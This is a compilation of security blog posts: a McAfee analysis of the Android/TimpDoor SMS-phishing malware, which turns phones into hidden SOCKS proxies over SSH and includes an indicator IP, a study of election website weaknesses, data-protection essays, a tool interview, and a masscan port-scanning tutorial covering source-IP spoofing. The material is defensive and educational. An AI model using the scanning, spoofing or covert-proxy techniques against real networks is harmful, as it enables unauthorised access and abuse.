  • Be careful what you click on. Be sure to only click on links in text messages that are from a trusted source. If you don’t recognize the sender, or the SMS content doesn’t seem familiar, stay cautious and avoid interacting with the message.
  • Enable the feature on your mobile device that blocks texts from the Internet. Many spammers send texts from an Internet service in an attempt to hide their identities. Combat this by using this feature to block texts sent from the Internet.
  • Use a mobile security software. Make sure your mobile devices are prepared for TimpDoor or any other threat coming their way. To do just that, cover these devices with a mobile security solution, such as McAfee Mobile Security.

And, as always, to stay up-to-date on the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post How to Squash the Android/TimpDoor SMiShing Scam appeared first on McAfee Blogs.

DisruptOps: Quick and Dirty: Building an S3 Guardrail with Config

Posted under:

Disrupt:Ops: Quick and Dirty: Building an S3 Guardrail with Config

In How S3 Buckets Become Public, and the Fastest Way to Find Yours we reviewed the myriad ways S3 buckets become public and where to look for them. Today I’ll show the easiest way to continuously monitor for public buckets using AWS Config. The good news is this is pretty easy to set up; the bad news is you need to configure it separately in every region in every account.

Read the full post at DisruptOps

- Rich (0) Comments Subscribe to our daily email digest

How to quickly manage and delete your Google search history

We already know Google collects a ton of data on us, and a lot of it comes from search. Google offers plenty of ways to limit the amount of data you have lying around, but they’re not all that easy to find. Starting today, Google is making it easier to both see and delete your search activity.

Previously, you could visit your Google Account in Settings on Android phones or on the web on iOS, tap Manage your data & personalization and then My Activity to see your search results. Then you needed to tap the three-dot menu and select Delete to get rid of something. Finding your search history on desktops was just as cumbersome.

To read this article in full, please click here

Android/TimpDoor Turns Mobile Devices Into Hidden Proxies

The McAfee Mobile Research team recently found an active phishing campaign using text messages (SMS) that tricks users into downloading and installing a fake voice-message app which allows cybercriminals to use infected devices as network proxies without users’ knowledge. If the fake application is installed, a background service starts a Socks proxy that redirects all network traffic from a third-party server via an encrypted connection through a secure shell tunnel—allowing potential access to internal networks and bypassing network security mechanisms such as firewalls and network monitors. McAfee Mobile Security detects this malware as Android/TimpDoor.

Devices running TimpDoor could serve as mobile backdoors for stealthy access to corporate and home networks because the malicious traffic and payload are encrypted. Worse, a network of compromised devices could also be used for more profitable purposes such as sending spam and phishing emails, performing ad click fraud, or launching distributed denial-of-service attacks.

Based on our analysis of 26 malicious APK files found on the main distribution server, the earliest TimpDoor variant has been available since March, with the latest APK from the end of August. According to our telemetry data, these apps have infected at least 5,000 devices. The malicious apps have been distributed via an active phishing campaign via SMS in the United States since at least the end of March. McAfee notified the unwitting hosts of the phishing domains and the malware distribution server; at the time of writing this post we have confirmed that they are no longer active.

Campaign targets North America

Since at least the end of March users in the United States have reported suspicious text messages informing them that they have two voice messages to review and tricking them into clicking a URL to hear them:

Figure 1. User reporting a text that required downloading a fake voice app. Source

Figure 2. An August 9 text. Source:

Figure 3. An August 26 text. Source:

If the user clicks on one of these links in a mobile device, the browser displays a fake web page that pretends to be from a popular classified advertisement website and asks the user to install an application to listen to the voice messages:

Figure 4. A fake website asking the user to download a voice app.

In addition to the link that provides the malicious APK, the fake site includes detailed instructions on how to disable “Unknown Sources” to install the app that was downloaded outside Google Play.

Fake voice app

When the user clicks on “Download Voice App,” the file VoiceApp.apk is downloaded from a remote server. If the victim follows the instructions, the following screens appear to make the app look legitimate:

Figure 5. Fake voice app initial screens.

The preceding screens are displayed only if the Android version of the infected device is 7.1 or later (API Level 25). If the Android version is earlier, the app skips the initial screens and displays the main fake interface to listen to the “messages”:

Figure 6. The main interface of the fake voice messages app.

Everything on the main screen is fake. The Recents, Saved, and Archive icons have no functionality. The only buttons that work play the fake audio files. The duration of the voice messages does not correspond with the length of the audio files and the phone numbers are fake, present in the resources of the app.

Once the user listens to the fake messages and closes the app, the icon is hidden from the home screen to make it difficult to remove. Meanwhile, it starts a service in the background without user’s knowledge:

Figure 7. Service running in the background.

Socks proxy over SSH

As soon as the service starts, the malware gathers device information: device ID, brand, model, OS version, mobile carrier, connection type, and public/local IP address. To gather the public IP address information, TimpDoor uses a free geolocation service to obtain the data (country, region, city, latitude, longitude, public IP address, and ISP) in JSON format. In case the HTTP request fails, the malware make an HTTP request to the webpage getIP.php of the main control server that provides the value “public_ip.”

Once the device information is collected, TimpDoor starts a secure shell (SSH) connection to the control server to get the assigned remote port by sending the device ID. This port will be later used for remote port forwarding with the compromised device acting as a local Socks proxy server. In addition to starting the proxy server through an SSH tunnel, TimpDoor establishes mechanisms to keep the SSH connection alive such as monitoring changes in the network connectivity and setting up an alarm to constantly check the established SSH tunnel:

Figure 8. An execution thread checking changes in connectivity and making sure the SSH tunnel is running.

To ensure the SSH tunnel is up, TimpDoor executes the method updateStatus, which sends the previously collected device information and local/public IP address data to the control server via SSH.

Mobile malware distribution server

By checking the IP address 199.192.19[.]18, which hosted VoiceApp.apk, we found more APK files in the directory US. This likely stands for United States, considering that the fake phone numbers in the voice app are in the country and the messages are sent from US phone numbers:

Figure 9. APK files in the “US” folder of the main malware distribution server.

According to the “Last modified” dates on the server, the oldest APK in the folder is chainmail.apk (March 12) while the newest is VoiceApp.apk (August 27) suggesting the campaign has run for at least five months and is likely still active.

We can divide the APK files into two groups by size (5.1MB and 3.1MB). The main difference between them is that the oldest use an HTTP proxy (LittleProxy) while the newest (July and August) use a Socks proxy (MicroSocks), which allows the routing of all traffic for any kind of network protocol (not only HTTP)TTp on any port. Other notable differences are the package name, control server URLs, and the value of appVersion in the updateStatus method—ranging from 1.1.0 to 1.4.0.

In addition to the US folder we also found a CA folder, which could stand for Canada.

Figure 10. The “CA” folder on the distribution server.

Checking the files in the CA folder we found that VoiceApp.apk and relevanbest.apk are the same file with appVersion 1.4.0 (Socks proxy server). Octarineiads.apk is version 1.1.0, with an HTTP proxy.

TimpDoor vs MilkyDoor

TimpDoor is not the first malware that turns Android devices into mobile proxies to forward network traffic from a control server using a Socks proxy though an SSH tunnel. In April 2017 researchers discovered MilkyDoor, an apparent successor of DressCode, which was found a year earlier. Both threats were distributed as Trojanized apps in Google Play. DressCode installs only a Socks proxy server on the infected device; MilkyDoor also protects that connection to bypass network security restrictions using remote port forwarding via SSH, just as TimpDoor does. However, there are some relevant differences between TimpDoor and MilkyDoor:

  • Distribution: Instead of being part of a Trojanized app in Google Play, TimpDoor uses a completely fake voice app distributed via text message
  • SSH connection: While MilkyDoor uploads the device and IP address information to a control server to receive the connection details, TimpDoor already has the information in its code. TimpDoor uses the information to get the remote port to perform dynamic port forwarding and to periodically send updated device data.
  • Pure proxy functionality: MilkyDoor was apparently an adware integrator in early versions of the SDK and later added backdoor functionality. TimpDoor’s sole purpose (at least in this campaign) is to keep the SSH tunnel open and the proxy server running in the background without the user’s consent.

MilkyDoor seems to be a more complete SDK, with adware and downloader functionality. TimpDoor has only basic proxy functionality, first using an HTTP proxy and later Socks.


TimpDoor is the latest example of Android malware that turns devices into mobile backdoors—potentially allowing cybercriminals encrypted access to internal networks, which represents a great risk to companies and their systems. The versions found on the distribution server and the simple proxy functionality implemented in them shows that this threat is probably still under development. We expect it will evolve into new variants.

Although this threat has not been seen on Google Play, this SMS phishing campaign distributing TimpDoor shows that cybercriminals are still using traditional phishing techniques to trick users into installing malicious applications.

McAfee Mobile Security detects this threat as Android/TimpDoor. To protect yourselves from this and similar threats, employ security software on your mobile devices and do not install apps from unknown sources.

The post Android/TimpDoor Turns Mobile Devices Into Hidden Proxies appeared first on McAfee Blogs.

State County Authorities Fail at Midterm Election Internet Security

One of the things we at McAfee have been looking at this midterm election season is the security of election infrastructure at the individual county and state levels.  A lot of media and cybersecurity research focus has been placed on whether a major national attack could disrupt the entire U.S. voting infrastructure. Headlines and security conferences focus on the elaborate “Hollywood-esque” scenarios where tampering with physical voting machines allows them to be hacked in 45 seconds, and the entire election system falls apart via a well-orchestrated nation state attack.  The reality is, information tampering and select county targeting is a more realistic scenario that requires greater levels of attention.

A realistic attack wouldn’t require mass voting manipulation or the hacking of physical machines. Rather it could use misinformation campaigns focused on vulnerable gaps at the county and state levels. Attackers will generally choose the simplest and most effective techniques to achieve their goal, and there are certain targets that have been overlooked which could prove to be the most practical avenues an attacker could take if their objective was to influence the outcome of an election cycle.

A well-crafted campaign could focus on specific states or congressional districts where a close race is forecasted. An attacker would then examine which counties would have a substantive impact if barriers were introduced to reduce voter turnout, either in total, or a specific subset (such as those in rural or urban parts of a district which generally have a strong correlation to conservative and liberal voting tendencies respectively).

Actors could use something as simple as a classic bulk email campaign to distribute links to fraudulent election websites that give voters false information about when, where and how to vote.  Given the fact that voter data can be purchased or even freely obtained from numerous recent breaches, a very specific and targeted campaign would be trivial.  As we will see – there are multiple challenges for a typical voter to identify legitimate from fraudulent sites, and the legitimate sites are often lacking the most basic security hygiene.

With this in mind we looked at how constituents get information from their election boards at the county level. County websites are typically the first place a citizen would go to look up information on the upcoming local elections.  Such information might include voter eligibility requirements, early voting schedules, deadlines to register, voting hours and other critical information.

McAfee ATR researchers surveyed the security measures of county websites in 20 states and found that the majority of these sites are sorely lacking in basic cybersecurity measures that could help protect voters from election misinformation campaigns.

What’s in a Website Name?

Our first disturbing revelation was that there’s no consistency as to how counties validate that their websites are legitimate sites belonging to genuine county officials.

I stumbled upon this initially because I live in Denton County Texas, where the voter information site is When I saw that, I was a little perplexed because the county actually uses a website address with a .com top level domain (TLD) name rather than a .gov TLD in the name.

Domain names using .gov must pass a U.S. federal government validation process to confirm that the website in question truly belongs to the official government entity. The use of .com raised the question of whether such a naming process is common or not across county websites in Texas and in other states.

This is important, because unlike .gov sites where there is a thorough vetting process and background checks (including government officials as references), anyone can buy a .com domain.

We found that large majorities of county websites use top level domain names such as .com, .net and .us rather than the government validated .gov in their web addresses. Our findings essentially revealed that there is no official U.S. governing body validating whether the majority of county websites are legitimately owned by actual legitimate county entities.

Our study focused primarily on the swing states, or the states that were most influential in the election process, and thus the most compelling targets for threat actors.  Minnesota and Texas had the largest percentage of domain names with 95.4% and 95% respectively. They were followed by Michigan (91.2%), New Hampshire (90%), Mississippi (86.6%) and Ohio (85.9%).

McAfee researchers found that Arizona had the largest percentage of .gov domain names, but even this state could only confirm 66.7% of county sites as using the validated addresses.

The other thing that was very concerning was that significant majorities of county sites did not enforce the use of SSL, or Secure Sockets Layer certificates. These digital certificates protect a website visitor’s web sessions, encrypting any personal information voters might share and ensuring that bad actors can’t redirect site visitors to fraudulent sites that might give them false election information.

SSL is one of the most basic forms of cyber hygiene, and something we expect all sites requiring confidentiality or data integrity to have at a minimum.  The fact that these websites are lacking in the absolute basics of cyber hygiene is troubling.

Maine had the highest number of county websites protected by SSL with 56.2%, but the state was something of an outlier. West Virginia had the greatest number of websites lacking in SSL security with 92.6% unprotected, followed by Texas (91%), Montana (90%), Mississippi (85.1%) and New Jersey (81%).

Above all, there was no consistency within states, let alone across the nation, in website naming or in how effectively SSL was applied to protect voters.

The following Orange County site protects user information with SSL at the voter registration section of the site, but not at the main home page, meaning an attacker could manipulate the content of the top-level site and replace the legitimate registration link with a fraudulent one. Those accessing the site would subsequently never be able to navigate to the legitimate protected site.

Florida’s Broward County became famous (perhaps infamous) during the 2000 presidential election as one of the state’s counties for which then-Vice President Al Gore requested a vote recount. Today, the site is not protected by SSL and has a .org address that is not distinguishable from a fake .org domain.  The browser itself actual calls out “Not Secure” when you go to the site.

Even sites that report election results are utilizing domains, such as the Glades County site below.

This following site from Scioto County in Ohio uses an unvalidated .NET top level domain and doesn’t protect site visitors with SSL.

The Fulton County Ohio site uses an unofficial .com top level domain and is also missing enforced SSL support.

The following site from New York’s Albany County uses an unvalidated .com TLD. It also fails to use SSL protection on the site’s critical voter information pages.

Lacking Basic Protection

Because SSL protection is a very well understood website security practice, the lack of it does not instill confidence that other systems managed at local levels are adequately secured.

Given how important the democratic process of voting is to our society and way of life, we must work to better secure these critical information systems.

If you think about a close election race with rural or urban district elements to it, a malicious actor could simply send emails to hundreds of thousands of voters in rural or urban parts of the municipality and direct voters to the wrong voting locations. Such an actor would essentially be disrupting, misdirecting and perhaps even suppressing voter turnout through misinformation.  No systems would be taken off line, no physical harm done, and likely no one would even notice until election day when angry voters showed up to the wrong sites.

We developed the following phishing email message to provide an educational example of what such an election campaign message might look like (we did NOT uncover it as a part of a real phishing campaign currently in progress):

To avoid early detection, it is most likely that a coordinated attack would take place just hours, perhaps a few days before a critical vote; the threat actors would want to provide enough time to reach a critical mass for election disruption, but little enough time to avoid detection and remediation.  At that point what could you even do?

Influencing the electorate through false communications is more practical, efficient and simpler than attempting to successfully hack into hundreds of thousands of voting machines. Such a scenario is much easier to execute than tampering with voting machines themselves, and it scales to achieve the broad election objective any malicious actor might desire.

What Must Be Done Nationally

Regardless of whether central regulation or best practice publication are the best approaches to election security, we need better security standardization for all of the supporting systems that deal with elections.

While it might be difficult to pass a federal law that would mandate things like .gov naming standardization or utilizing SSL protection, an organization like the U.S. Department of Homeland Security could take a leading role by recommending these best practices.

How Voters Can Protect Themselves Locally

First, regarding SSL protection, anyone can always determine whether or not their communication with a website is protected by SSL by looking for an “HTTPS” in a site’s website address in the address bar of their browser. Some browsers also show a key or lock icon to make SSL protection easier for users to spot before they share street addresses, dates of birth, Social Security Numbers, credit card numbers or other sensitive personal information.  

As for the validity of election websites, McAfee encourages voters across the country to rely on state voter registration and election sites.  Such sites have a better track record of utilizing .gov TLDs and generally enforce SSL to protect integrity and confidentiality.   These sites may navigate voters to their local sites which may suffer from the security issues described in this blog, but utilizing a state secured .gov site as a starting point is better than a search engine.

State voter registration websites:

  1. Alabama
  2. Alaska
  3. Arizona
  4. Arkansas
  5. California
  6. Colorado
  7. Connecticut
  8. DC
  9. Delaware
  10. Florida
  11. Georgia
  12. Hawaii
  13. Idaho
  14. Illinois
  15. Indiana
  16. Iowa
  17. Kansas
  18. Kentucky
  19. Louisiana
  20. Maine
  21. Maryland
  22. Massachusetts
  23. Michigan
  24. Minnesota
  25. Missouri
  26. Montana
  27. Nebraska
  28. Nevada
  29. New Hampshire
  30. New Jersey
  31. New Mexico
  32. New York
  33. North Carolina
  34. North Dakota
  35. Ohio
  36. Oklahoma
  37. Oregon
  38. Pennsylvania
  39. Rhode Island
  40. South Carolina
  41. South Dakota
  42. Tennessee
  43. Texas
  44. Utah
  45. Vermont
  46. Virginia
  47. Washington
  48. West Virginia
  49. Wisconsin
  50. Wyoming

Finally, state governments provide information phone numbers allowing voters to confirm election information. McAfee encourages voters to call these official phone numbers to confirm any seemingly contradictory information sent to them, particularly if voters received any email or other online messages regarding changes to planned election processes (time, location, ballots, etc.).

Our country’s democracy is worth a phone call.


For more perspectives on U.S. election security, please read here on the topic.

The post State County Authorities Fail at Midterm Election Internet Security appeared first on McAfee Blogs.

Contextualizing trust – how best to protect businesses’ critical data


Behavior Analytics Data Dynamic Data Protection Insider Threat Dr. Richard Ford


The way forward is fairly clear – wide adoption of fine-grained, context-sensitive trust is the right approach. Furthermore, this contextual model of trust needs to be applied to more than just people on specific programs, but to every entity that interacts with a system, as well as the system itself.

Main Content

Let’s cut straight to the chase: today’s businesses have real challenges with critical data protection. It’s not just the obvious targets too, such as healthcare providers and financial services; users happily share personal information via social networks, and the wealth of data tracked by the Internet of Things is mind-boggling. If you have a credit score – and you almost certainly do – there’s a lot of information that’s out there in the ether about you.

Sadly, when I say out there, I don’t just mean in the hands of the credit agencies: the 2017 breach of credit reporting agency Equifax exposed 143 million American consumers. Similarly, in September of this year, the largest breach in Facebook’s history exposed the personal information of nearly 50 million users. In today’s society, even if you’re off the grid, trust me when I tell you you’re not actually “off the grid”.

Given the lack of good choices for consumers, end users find themselves in the unenviable position of having little choice but to trust the companies that their data passes through. Similarly, though, these same companies are also in the position of having to trust – or distrust – those people, devices, systems, and infrastructure that make up the overall IT environment.

That’s a lot of trust, and is in fact part of the challenge. While people, devices, systems and infrastructure can have different priorities, agendas, and weaknesses, businesses have traditionally painted with a pretty broad brush when it comes to trust. That’s a mistake, as trust can be a powerful ally in our hunt for better, safer, and more secure relationships between provider and consumer.

In the commercial world, businesses could start by taking a page from the government playbook. Government agencies have a long history with trust - one only has to look at the clearance process that validates the trustworthiness of those who access classified data and how classified data is isolated from those who do not possess the requisite clearances for access. Governments also understand the need to balance the dual concepts of trustworthiness and risk acceptance as part of using multilevel secure systems. Mostly, this works well, even against some fairly determined external attackers as well as malicious insiders and spies. It’s easy to focus on the times this approach has broken down, but we also need to be aware of the many times it has performed exactly as designed.

But even this framework has weaknesses. Trust is interwoven throughout, but only in parts of the government, and even then, sometimes dosed out in a rather “all or nothing” way. The problem is the way we typically decontextualize trust and that stems from how we tend to think about trust differently in the online world.

When you meet someone socially and are getting to know them, most of us take cues from those initial conversations to figure out how trustworthy someone is. However, that trust is situational. You might trust your new friend to provide a ride to dinner, but not trust them (yet) with the keys to your car. It’s not just about determining whether a person is “good” or “bad”, but whether they are likely to perform a particular action reliably or not. For example, you might know someone is entirely well-intentioned but very clumsy. You might not trust that clumsy person with your most treasured crystal glass, for example, even though they are honest, reliable, and kind. It’s not that they’re bad… they’re just bad with fragile things. It’s a subtle but important difference: it’s not just do you trust someone, but do you trust someone with respect to a particular action.

Now let’s compare this to how we view trust with respect to computing. Here, defenders often apply a high degree of “inside/outside” thinking along the lines of “what’s inside is good and what’s outside is bad”. Once I’m logged in to a machine or part of an organization, I’m pretty much given free rein within my granted rights. There are some checks and balances: insider threat programs, for example, try to identify those insiders who are a danger to the organization. However, the overarching paradigm is one of trust or distrust, with not much in between. It’s the same with machines: once a machine is placed on the network, we generally trust it completely. This type of “trust” isn’t trust at all – because it’s not situational - it’s a more “permit or deny” privilege-based system... and it’s easy for an attacker to exploit. Essentially, by decontextualizing the trust and reducing it to an all or nothing score, we allow anyone who gets into that trusted domain to do whatever they like: the challenge for the attacker is then reduced to how to get in the door.

The way forward is fairly clear – wide adoption of fine-grained, context-sensitive trust is the right approach. Furthermore, this contextual model of trust needs to be applied to more than just people on specific programs, but to every entity that interacts with a system, as well as the system itself.

The only long-term solution to data management is to embrace this contextual-trust-based architecture in a consistent and broad manner. Moving away from the “inside/outside, good/bad” mindset has already started (behavioral analytics are a much needed first step and can be very effective in detecting abuses of granted trust) – and it should be encouraged. What’s needed next is to recognize that trust comes in degrees and to utilize this contextual trust concept to deliver risk-adapting cybersecurity policies. The world really is about shades of grey; treating it that way will enable us to protect the data that is most important to us.

Color options

Light Gray

Promote to home page?


Featured on the Channel page

Page Name

Contextualizing trust – how best to protect businesses' critical data

Exclusive Interview with SPYSE team on free security tools and new projects

Exclusive Interview with SPYSE team on free security tools and new projects

I don't think many of you have heard of SPYSE (I didn't before this interview) before, but let me tell you - they are amazing people, great developers and believe me when I say they are contributing great to information security community with their amazing tools and projects. I got interested and frankly heard about them when I checked out on certdb and findsubdomains projects - remarkable sites and highly recommended to have a look! I authored a review on their projects - CertDB is a free SSL Search Engine, and Finding Sub-Domains for Open Source Intelligence and have spoken highly of them. So, in last few days I got a chance to ask them some questions on their project CertDB, and their ongoing efforts to share with you all.

What is CERTDB? Is it a project under some company, or a company in itself or an entrepreneurship idea from some smart team? Who's the backbone of CERTDB?

We are SPYSE team, skilled specialists in the field of web-analytics and digital security. In 2017 we formed a unit, that on voluntary basis will develop non-profit tools and services for exploration and analytics of general data available on the internet. - internet-wide search engine for research and analytics of digital certificates. This is the first project of the SPYSE team that gathered in 2017 with an ambition to make a search engines across the entire Internet infrastructure for educational, research and practical purposes, which combines the key capabilities of f.e. Censys, Shodan, Domaintools and other services, and significantly exceeds them in terms of data completeness and analytical capabilities. Our portfolio currently includes besides Certdb such services as designed to automate subdomains discovering. Currently we are working on another project related to DNS. We plan on releasing one project every month.

The mission of the project lies in blurring the widespread belief that an SSL Certificate is just a minor collection of the data files that digitally bond the cryptographic key to the businesses' details. On the opposite, the creators of CertDB aim to change the nature of things around the average users of the internet.

Future projects include analytic tools for domain/subdomain analysis, IP ranges, DNS addresses, and connections between organizations and their digital assets. We believe that our team is quite strong and we plan on releasing one project every month. In about 4 months, we intend to group these services together to create a search engine that would encompass all of these areas. We make a search engine across the entire Internet infrastructure, which combines the key capabilities of Censys, Shodan, Domaintools and other services, and significantly exceeds them in terms of data completeness and analytical capabilities. This tool will have a more complete pool of data than any existing resource on the web.

Examples of available queries: and CertDB use cases:

  1. Newly issued certificate could help identify a launch of a new service, merger between organizations and other market activities faster than any press release.
  2. It is of utmost importance to keep track of SSL certificates expiration times. Once SSL certificate expires, it could mean unpleasant consequences for both the website and the end user. These could include loss of trust, drop in profits due to abandoned shopping carts, damage to organization’s image and reputation, privacy risks.
  3. CertDB is not a mechanism that is of use only to the professionals in the IT field. Exploring SSL certificates one can analyze business activity of not only individual organizations but also whole industries or markets, and identify trends.
  4. The company of the focus may issue the certificate in an organization with the domains of other companies, which could mean the collaboration or purchase of one company by another. Such information could potentially generate profits as insight information or even lead to the start of the investigation (if there are indications of unfair business practices)
  5. A company specializing in security breaches may use CertDB for researching the problematic certificates to weaken the possibility of the hacker attacks ultimately.
  6. The commercial SSL-selling firm may increase its sales by "warning" the companies suffering from the affected subdomains and domains.
  7. The company could register the domain hinting the upcoming start of the initial coin offerings. This promising piece of evidence can help with the competitive analysis or business analytics among others. Besides, it gives the data owner an ability to gather funds for the potential investment.
  8. The registration of a new unknown domain in Palo Alto may hints at a new start-up; switching from the "Wildcard" certificate to "Let's Encrypt" tells us about the organization's budget constraints.
  9. Based on the number of SSL certificates issued to domains of a particular country, as well as number of certificates per capita, one can gauge the maturity of IT infrastructure in different countries.

We are just at the beginning of our journey and would really appreciate any help or assistance – constructive feedback, advice, mentions, coverage options and connections.

Do you have any active market competition, and what is your USP (unique selling point) if there are other players?

CertDB's key selling points:
— it's completely free; we're developing this projects as volunteers for educational & research proposes so they will be free forever;
— its the most complete certs base in internet;
— its the most accurate and updated every day scanning the whole internet;
— CertDB has the best UI because we care not only about data but about user experience too.

We analyze the web 24/7 to offer you the most complete and up-to-date information about SSL certificates on the internet.

CertDB provides free access to its powerful API. You can use API for practical research or educational purposes, or for implementation of other programs and services.
Our service provides search capabilities by multiple criteria, quality filtering. We also aggregate data by various criteria, which makes it possible to see the picture on a larger scale.
We pay great attention to UX / UI, page load speed and other details, our projects are user-oriented. Our developers constantly investigate behavioral factors and feedback from users in order to make projects better.

In our previous discussion, you mentioned about search/ filter capacity with CERTDB which that makes you different than let's say CRT.SH. How about CENSYS ( - how do you stack against them?

Our work on certificates, at first glance, is very similar to We proceeded from the same problems of developers and experts, therefore our search mechanisms have a number of coincidences. At the same time, it should be noted that we largely sought to make the project so that they could be used by non-professionals and also receive valuable information. We understand that this is a complex and lengthy process, but we are deeply committed to making and showing the market a product not for geeks, but for a wide audience.

You mentioned about scanning, and having sensors. How do you categorize or short-list the websites? And, if someone wants to list their website for active monitoring, do you have a SUBMISSION form?

In fact, our team does not only deal with digital certificates, of course. At the moment, we are exploring the web part of the entire IPv4 range by a variety of different techniques. A significant part of the data for the starting point of the research was taken from public sources, some were discovered by ourselves, some are obtained from partners. The SUBMISSION form seems to us inexpedient due to the fact that there are hardly any domains that we do not know about.

I checked my website in your database, and it shows my old certificate; how often do you plan to scan websites and do you have a priority criterion for scanning?

In the near future we are preparing an infrastructure for regular and systemic scanning of all known points on the Internet, according to our plans, in no more than a month we will be able to update the information for each point that has given any signs of life for the last 6 months at least every two weeks, in reality, according to our expectations, much more often.

From a security point of view have you gone through any security testing or assessment in the past, or planned to do so?

The main part of the SPYSE team works in IT security. Project ideas were originally born out of our daily needs. We did and do testing for many companies (under NDA), we have quite a lot of knowledge. However, we distance our current services from our work, we target them for a much wider audience, for educational purposes, to give interested people more opportunities to study the Internet, and researchers to explore and analyze it for free.

If we talk about the security of our projects, then we try to make it right, although we have not focused on security issues separately - we have nothing to steal.

Do you plan to keep the service free, or launch any subscription based, or pricing model for better search, filters etc. in the future?

We plan to keep our services entirely free. We want to believe that our current affairs are useful to people. This motivates us the most. We really want to spread the message about our free services and make them accessible to regular users. Hope that readers of this article can support us in that.

// Keep it up guys, and we are excited for your new projects.

Cover Image Credit: Jonathan Velasquez

Introducing Data Guardrails and Behavioral Analytics: Understand the Mission

Posted under: Research and Analysis

After over 25 years of the modern IT security industry, breaches still happen at an alarming rate. Yes, that’s fairly obvious but still disappointing, given the billions spent every year in efforts to remedy the situation. Over the past decade the mainstays of security controls have undergone the next generation treatment – initially firewalls and more recently endpoint security. New analytical techniques have been mustered to examine infrastructure logs in more sophisticated fashion.

But the industry seems to keep missing the point. The objective of nearly every hacking campaign is (still) to steal data. So why focus on better infrastructure security controls and better analytics of said infrastructure? Mostly because data security is hard. The harder the task, the less likely overwhelmed organizations will have the fortitude to make necessary changes.

To be clear, we totally understand the need to live to fight another day. That’s the security person’s ethos, as it must be. There are devices to clean up, incidents to respond to, reports to write, and new architectures to figure out. The idea of tackling something nebulous like data security, with no obvious solution, can remain a bridge too far.

Or is it? The time has come to revisit data security, and to utilize many of the new techniques pioneered for infrastructure to address the insider threat where it appears: attacking data. So our new series, Protecting What Matters: Introducing Data Guardrails and Behavioral Analytics, will introduce some new practices and highlight new approaches to protecting data.

Before we get started, let’s send a shout-out to Box for agreeing to license this content when we finish up this series. Without clients like Box, who understand the need for forward-looking research to tell you where things are going, not reports telling you where they’ve been, we wouldn’t be able to produce research like this.

Understanding Insider Risk

While security professionals like to throw around the term “insider threat”, it’s often nebulously defined. In reality it includes multiple categories, including external threats which leverage insider access. We believe to truly address a risk you first need to understand it (call us crazy). To break down the first level of the insider threat, let’s consider its typical risk categories:

  1. Accidental Misuse: In this scenario the insider doesn’t do anything malicious, but makes a mistake which results in data loss. For example a customer service rep could respond to an email sent by a customer which includes private account info. It’s not like the rep is trying to violate policy, but they didn’t take the time to look at the message and clear out any private data.
  2. Tricked into Unwanted Actions: Employees are human, and can be duped into doing the wrong thing. Phishing is a great example. Or providing access to a folder based on a call from someone impersonating an employee. Again, this isn’t malicious, but it can still cause a breach.
  3. Malicious Misuse: Sometimes you need to deal with the reality of a malicious insider intentionally stealing data. In the first two categories the person isn’t trying to mask their behavior. In this scenario they are deliberately obfuscating, which that means you need different tactics to detect and prevent the activity.
  4. Account Takeover: This category reflects the fact that once an external adversary has presence on a device, they become an ‘insider’; with a compromised device and account, they have access to critical data.

We need to consider these categories in the context of adversaries so you can properly align your security architecture. So who are the main adversaries trying to access your stuff? Some coarse-grained categories follows: unsophisticated (using widely available tools), organized crime, competitors, state-sponsored, and finally actual insiders. Once you have figured out your most likely adversary and their typical tactics, you can design a set of controls to effectively protect your data.

For example an organized crime faction looks to access data related to banking or personal information for identity theft. But a competitor is more likely looking for product plans or pricing strategies. You can (and should) design your data protection strategy with these likely adversaries in mind, to help prioritize what to protect and how.

Now that you understand your adversaries and can infer their primary tactics, you have a better understanding of their mission. Then you can select a data security architecture to minimize risk, and optimally prevent any data loss. But that requires us to use different tactics than would normally be considered data security.

A New Way to Look at Data Security

If you surveyed security professionals and asked what data security means to them, they’d likely say either encryption or Data Loss Prevention (DLP). When all you have is a hammer, everything looks like a nail, and for a long time those two have been the hammers available to us. Of course the fact that we want to expand our perspective a bit doesn’t mean DLP and encryption no longer have any roles to play in data protection. Of course they do. But we can supplement them with some new tactics.

  • Data Guardrails: We have defined Guardrails as a means to enforce best practices without slowing down or impacting typical operations. Typically used within the context of cloud security (like, er, DisruptOps), a data guardrail enables data to be used in certain ways while blocking unauthorized usage. To bust out an old network security term, you can think of guardrails as like “default-deny” for data. You define the set of acceptable practices, and don’t allow anything else.
  • Data Behavioral Analytics: Many of you have heard of UBA (User Behavioral Analytics), where all user activity is profiled, and you then look for anomalous activities which could indicate one of the insider risk categories above. What if you turned UBA inside-out and focused on the data? Using similar analytics you could profile the usage of all the data in your environment, and then look for abnormal patterns which warrant investigation. We’ll call this DataBA because your database administrators might be a little peeved if we horned in on their job title.

Our next post will dig farther into these new concepts of Data Guardrails and DataBA, to illuminate both the approaches and their pitfalls.

- Mike Rothman (0) Comments Subscribe to our daily email digest

Masscan as a lesson in TCP/IP

When learning TCP/IP it may be helpful to look at the masscan port scanning program, because it contains its own network stack. This concept, "contains its own network stack", is so unusual that it'll help resolve some confusion you might have about networking. It'll help challenge some (incorrect) assumptions you may have developed about how networks work.
For example, here is a screenshot of running masscan to scan a single target from my laptop computer. My machine has an IP address of, but masscan runs with an address of This works fine, with the program contacting the target computer and downloading information -- even though it has the 'wrong' IP address. That's because it isn't using the network stack of the notebook computer, and hence, not using the notebook's IP address. Instead, it has its own network stack and its own IP address.

At this point, it might be useful to describe what masscan is doing here. It's a "port scanner", a tool that connects to many computers and many ports to figure out which ones are open. In some cases, it can probe further: once it connects to a port, it can grab banners and version information.

In the above example, the parameters to masscan used here are:
  • -p80 : probe for port "80", which is the well-known port assigned for web-services using the HTTP protocol
  • --banners : do a "banner check", grabbing simple information from the target depending on the protocol. In this case, it grabs the "title" field from the HTML from the server, and also grabs the HTTP headers. It does different banners for other protocols.
  • --source-ip : this configures the IP address that masscan will use
  • : the target to be scanned. This happens to be a Google server, by the way, though that's not really important.
Now let's change the IP address that masscan is using to something completely different, like The difference from the above screenshot is that we no longer get any data in response. Why is that?

The answer is that the routers don't know how to send back the response. It doesn't go to me, it goes to whoever owns the real address If you visualize the Internet, the subnetworks are on the edges. The routers in between examine the destination address of each packet and route it in the proper direction. You can send packets from from anywhere in the network, but responses will always go back to the proper owner of that address.

Thus, masscan can spoof any address it wants, but if it's an address that isn't on the local subnetwork, then it's never going to see the response -- the response is going to go back to the real owner of the address. By the way, I've made this mistake before. When doing massive scans of the Internet, generating billions of packets, I've accidentally typed the wrong source address. That meant I saw none of the responses -- but the hapless owner of that address was inundated with replies. Oops.

So let's consider what masscan does when you use --source-ip to set its address. It does only three things:
  • Uses that as the source address in the packets it sends.
  • Filters incoming packets to make sure they match that address.
  • Responds to ARP packets for that address.
